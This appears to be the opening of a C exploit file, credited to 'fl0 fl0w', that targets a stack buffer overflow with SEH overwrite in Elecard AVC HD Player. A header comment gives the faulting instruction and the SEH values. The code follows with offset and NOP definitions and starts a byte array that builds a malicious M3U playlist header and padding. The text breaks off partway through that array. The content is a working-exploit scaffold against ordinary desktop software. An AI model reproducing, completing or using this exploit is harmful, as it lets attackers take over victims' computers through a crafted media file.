1 /*ELECARD AVC HD PLAYER STACK BUFFER OVERFLOW ( SEH OVERWRITE )
2 Name: elecard.c
3 CREDITS: the one and only fl0 fl0w
4 004533AE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
5
6 SEH chain of main thread
7 Address SE handler
8 0012CB54 FFFFFFFF
9
10 Open in debugger and you’ll see SEH −−>FFFFFFFF and NEXT_SEH EB049090
11
12 */
13
14 //START
15 #include <windows.h>
16 #include <stdlib.h>
17 #include <stdio.h>
18 #include <string.h>
19 #include <stdint.h>
20 #include <assert.h>
21
22 #define ALLOCSIZE 14911
23 #define ALLOCMEM (x) { x = (char *)malloc (ALLOCSIZE * sizeof (char)) }
24 #define SEH 62
25 #define NEXT_SEH 58
26 #define NOP 0x90
27 #define NULLBYTE 0x00
28
29 uint8_t Header [] = { 0x23, 0x45, 0x58, 0x54, 0x4D, 0x33, 0x55, 0x0D, 0x0A, 0x23, 0x45, 0x58, 0x54, 0x49, 0x4E, 0x46,
30 0x3A, 0x33, 0x3A, 0x33, 0x36, 0x2C, 0x45, 0x76, 0x65, 0x72, 0x79, 0x20, 0x79, 0x6F, 0x75, 0x20,
31 0x65, 0x76, 0x65, 0x72, 0x79, 0x20, 0x6D, 0x65, 0x28, 0x53, 0x69, 0x6E, 0x67, 0x6C, 0x65, 0x20,
32 0x4D, 0x69, 0x78, 0x29, 0x0D, 0x0A, 0x43, 0x3A, 0x5C, 0x80, 0x82, 0x82, 0x82, 0x82, 0x60, 0x60,
33 0x60, 0x60, 0x80, 0x80, 0x80, 0x80, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
34 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
35 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
36 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
37 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
38 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
39 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
40 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
41 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x4